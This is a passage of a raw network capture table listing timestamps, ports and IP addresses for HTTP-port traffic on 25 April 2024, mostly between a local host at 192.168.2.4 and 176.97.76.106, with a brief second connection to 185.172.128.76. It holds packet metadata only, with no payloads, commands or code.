Apr 25, 2024 12:16:10.548854113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.548867941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.548907042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.548924923 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.548959970 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.548960924 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549005985 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549014091 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549024105 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549040079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549066067 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549098969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549115896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549133062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549160004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549176931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549202919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549220085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549251080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549261093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549326897 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549345016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549360991 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549381018 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549390078 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549411058 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549432993 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549455881 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549487114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549508095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549513102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549551964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549640894 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549675941 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549685955 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549762964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549779892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549798012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549813986 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549830914 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549830914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549850941 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549873114 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.549877882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549895048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549933910 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.549983978 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550009012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550026894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550028086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550026894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550091028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550133944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550151110 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550153017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550189972 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550221920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550240040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550256014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550272942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550273895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550338984 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550350904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550368071 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550384998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550401926 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550415993 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550438881 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550440073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550472021 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550488949 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550492048 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550519943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550537109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550596952 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550643921 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550659895 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550659895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550695896 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550702095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550725937 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550743103 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550827026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550842047 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550843954 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550860882 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550878048 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.550899982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.550899982 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.598884106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.667690039 CEST	80	49734	185.172.128.76	192.168.2.4
Apr 25, 2024 12:16:10.668066978 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:10.669378042 CEST	49734	80	192.168.2.4	185.172.128.76
Apr 25, 2024 12:16:10.781922102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.781944036 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.781960964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.781976938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782015085 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782032013 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782033920 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782084942 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782188892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782232046 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782248020 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782263994 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782290936 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782330990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782351971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782370090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782423973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782442093 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782481909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782497883 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782532930 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782572031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782572031 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782593012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782609940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782632113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782648087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782665014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782665014 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782723904 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.782727957 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.782799959 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783031940 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783050060 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783124924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783137083 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783142090 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783159971 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783219099 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783221006 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783240080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783256054 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783262968 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783272028 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783288002 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783297062 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783349991 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783597946 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783643961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783660889 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783678055 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783731937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783736944 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783752918 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783801079 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783802032 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783852100 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783862114 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783879042 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783922911 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.783935070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783951998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.783988953 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784013987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784029961 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784054995 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784060955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784107924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784141064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784162045 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784183025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784197092 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784199953 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784218073 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784235001 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784277916 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784280062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784301996 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784310102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784327030 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784382105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784384012 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784420967 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784437895 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784487963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784487963 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784504890 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784522057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784538984 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784555912 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784574032 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784576893 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784605026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784612894 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784622908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784672022 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784681082 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784703016 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784718990 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784748077 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784780025 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784812927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784838915 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784853935 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784869909 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784883976 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784887075 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784912109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.784945011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784969091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.784986973 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785002947 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785020113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785028934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785028934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785058975 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785075903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785077095 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785120010 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785156012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785195112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785211086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785228014 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785247087 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785247087 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785263062 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785280943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785290956 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785306931 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785312891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785331011 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785361052 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785361052 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785406113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785410881 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785423040 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785468102 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785475969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785491943 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785516024 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785532951 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785551071 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785581112 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785584927 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785597086 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785684109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785697937 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785725117 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785754919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785800934 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785851955 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785900116 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785932064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785948992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.785950899 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.785983086 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786010981 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786027908 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786057949 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786060095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786112070 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786132097 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786143064 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786159992 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786209106 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786227942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786245108 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786262989 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786281109 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786281109 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786298990 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786314964 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786331892 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786369085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786369085 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786408901 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786426067 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786442995 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786458969 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786494017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786494017 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786505938 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786524057 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786559105 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786565065 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786649942 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786665916 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786689043 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786700964 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786706924 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786736012 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786771059 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786787987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786811113 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786832094 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786859035 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786875963 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786892891 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786922932 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786948919 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786979914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.786993027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786993027 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.786997080 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787041903 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787071943 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787090063 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787111998 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787127972 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787146091 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787149906 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787189960 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787190914 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787254095 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787278891 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787322044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787322044 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787350893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787369013 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787384987 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787416935 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787446976 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787486076 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787496090 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787503004 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787520885 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787558079 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787570000 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787628889 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787645102 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787677050 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787719965 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787736893 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787765026 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787796974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787796974 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787833929 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787852049 CEST	80	49733	176.97.76.106	192.168.2.4
Apr 25, 2024 12:16:10.787889004 CEST	49733	80	192.168.2.4	176.97.76.106
Apr 25, 2024 12:16:10.787889004 CEST	80	49733	176.97.76.106	192.168.2.4
